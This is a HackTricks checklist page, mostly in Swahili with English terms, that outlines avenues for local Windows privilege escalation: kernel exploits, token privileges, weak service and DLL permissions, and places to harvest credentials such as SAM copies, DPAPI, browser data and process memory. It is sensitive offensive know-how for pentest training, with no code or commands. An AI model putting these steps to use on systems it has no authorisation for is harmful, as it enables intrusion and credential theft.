HackTricksOrodha ya ukaguzi - Local Windows Privilege Escalation
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Chombo bora cha kutafuta Windows local privilege escalation vectors: WinPEAS
System Info
- Pata System information
- Tafuta kernel exploits using scripts
- Tumia Google kutafuta kernel exploits
- Tumia searchsploit kutafuta kernel exploits
- Je, kuna taarifa za kuvutia katika env vars?
- Maneno ya siri katika PowerShell history?
- Je, kuna taarifa za kuvutia katika Internet settings?
- Drives?
- WSUS exploit?
- Third-party agent auto-updaters / IPC abuse
- AlwaysInstallElevated?
Logging/AV enumeration
- Angalia Audit na WEF mipangilio
- Angalia LAPS
- Angalia ikiwa WDigest iko hai
- LSA Protection?
- Credentials Guard?
- Cached Credentials?
- Angalia ikiwa kuna AV
- AppLocker Policy?
- UAC
- Angalia User Privileges
- Angalia current user privileges
- Je, wewe ni member of any privileged group?
- Angalia ikiwa una mojawapo ya token hizi zilizoamilishwa: SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege ?
- Users Sessions?
- Angalia users homes (ufikiaji?)
- Angalia Password Policy
- Nini kiko inside the Clipboard?
Network
- Angalia current network information
- Angalia huduma za ndani zilizofichwa zinazofikiwa kutoka nje
Running Processes
- Angalia ruhusa za binaries za michakato: file and folders permissions
- Memory Password mining
- Insecure GUI apps
- Pora credentials kutoka kwa interesting processes kwa kutumia
ProcDump.exe? (firefox, chrome, etc …)
Services
- Can you modify any service?
- Can you modify the binary that is executed by any service?
- Can you modify the registry of any service?
- Can you take advantage of any unquoted service binary path?
- Service Triggers: enumerate and trigger privileged services
Applications
- Ruhusa za kuandika kwenye programu zilizowekwa: permissions on installed applications
- Startup Applications
- Vulnerable Drivers
DLL Hijacking
- Je, unaweza kuandika katika folda yoyote ndani ya PATH?
- Je, kuna binary ya service inayojulikana ambayo inajaribu kupakia any non-existant DLL?
- Je, unaweza kuandika katika folda yoyote ya binaries?
Network
- Tambua mtandao (shares, interfaces, routes, neighbours, …)
- Angalia kwa makini huduma za mtandao zinazosikiliza kwa localhost (127.0.0.1)
Windows Credentials
- Winlogon credentials
- Windows Vault credentials ambazo unaweza kutumia?
- Je, kuna taarifa za kuvutia katika DPAPI credentials?
- Nyw za mitandao ya Wifi networks zilizohifadhiwa?
- Je, kuna taarifa za kuvutia katika saved RDP Connections?
- Maneno ya siri katika recently run commands?
- Remote Desktop Credentials Manager passwords?
- AppCmd.exe exists? Credentials?
- SCClient.exe? DLL Side Loading?
Files and Registry (Credentials)
- Putty: Creds na SSH host keys
- SSH keys in registry?
- Manenosiri katika unattended files?
- Kuna nakala ya SAM & SYSTEM?
- Cloud credentials?
- Faili ya McAfee SiteList.xml?
- Cached GPP Password?
- Neno la siri katika IIS Web config file?
- Je, kuna taarifa za kuvutia katika web logs?
- Je, unataka ask for credentials kwa mtumiaji?
- Je, kuna files inside the Recycle Bin za kuvutia?
- Kuna registry containing credentials nyingine?
- Kati ya Browser data (dbs, history, bookmarks, …)?
- Generic password search katika faili na registry
- Tools za kutafuta manenosiri moja kwa moja
Leaked Handlers
- Je, una ufikiaji wa handler yoyote wa mchakato unaoendeshwa na administrator?
Pipe Client Impersonation
- Angalia kama unaweza kuitumia kwa matumizi mabaya
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.